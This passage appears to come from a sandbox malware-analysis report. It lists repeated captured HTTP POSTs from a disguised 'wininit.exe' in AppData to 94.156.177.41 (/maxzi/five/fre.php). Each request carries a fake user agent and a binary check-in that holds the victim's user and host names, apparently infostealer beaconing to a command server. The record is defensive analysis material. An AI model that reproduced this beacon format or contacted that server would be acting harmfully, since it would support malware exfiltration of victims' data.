                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:20.573694944 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:21.314732075 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:21 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    69192.168.2.224923294.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:21.463058949 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:21.471179962 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:22.217380047 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:22 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    70192.168.2.224923394.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:22.357079029 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:22.364648104 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:23.253979921 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:23 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    71192.168.2.224923494.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:23.403670073 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:23.410558939 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:24.404211044 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:24 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    72192.168.2.224923594.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:24.562783003 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:24.567819118 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:26.308274984 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:25 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.
                                                    Nov 20, 2024 11:09:26.308907986 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:25 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.
                                                    Nov 20, 2024 11:09:26.573856115 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:25 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    73192.168.2.224923694.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:26.576240063 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:26.583370924 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:27.498418093 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:27 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    74192.168.2.224923794.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:27.793325901 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:27.798263073 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:28.601366043 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:28 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    75192.168.2.224923894.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:28.865047932 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:28.872432947 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:29.678623915 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:29 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    76192.168.2.224923994.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:29.846641064 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:29.853943110 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:30.598742008 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:30 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    77192.168.2.224924094.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:30.925380945 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:30.933082104 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:31.681325912 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:31 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    78192.168.2.224924194.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:31.823512077 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:31.828471899 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:32.557110071 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:32 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    79192.168.2.224924294.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:32.709058046 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:32.713977098 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:33.605262041 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:33 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    80192.168.2.224924394.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:33.921736956 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:33.926911116 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:34.675167084 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:34 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    81192.168.2.224924494.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:34.822855949 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:34.827985048 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:35.668055058 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:35 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    82192.168.2.224924594.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:35.803652048 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:35.811111927 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:36.752933979 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:36 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    83192.168.2.224924694.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:36.898722887 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:36.907516003 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:37.665819883 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:37 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    84192.168.2.224924794.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:37.822323084 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:37.827332020 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:38.569812059 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:38 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    85192.168.2.224924894.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:38.712826967 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:38.717822075 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:39.499545097 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:39 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    86192.168.2.224924994.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:39.647249937 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:39.652335882 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:40.469007015 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:40 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    87192.168.2.224925094.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:40.604469061 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
